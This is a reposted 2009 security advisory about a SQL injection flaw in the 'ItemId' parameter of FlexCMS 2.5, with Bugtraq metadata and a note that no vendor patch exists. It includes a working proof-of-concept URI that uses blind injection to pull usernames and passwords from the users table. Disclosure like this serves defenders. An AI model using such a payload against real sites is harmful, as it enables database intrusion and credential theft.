|
Feeds -
Exploits
|
|
Written by Lanti-Net
|
|
Monday, 06 April 2009 23:01 |
FlexCMS 'ItemId' Parameter SQL Injection Vulnerability
-\\Bugtraq ID: 34394
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Apr 06 2009 12:00AM
-\\Updated: Apr 06 2009 08:26PM
-\\Credit: Lanti-Net
-\\Vulnerable: FlexCMS FlexCMS 2.5 FlexCMS FlexCMS 0
-\\Discussion FlexCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
-\\Exploit(s)/PoC(s): Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/flx/aktiviteter/kalender/?ItemId=5%20and%20ascii (substring((SELECT%20concat(username,0x3a,password)%20from%20users%20li mit%200,1),1,1))>95
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --FlexCMS Homepage http://www.flexcms.com (FlexCMS)
|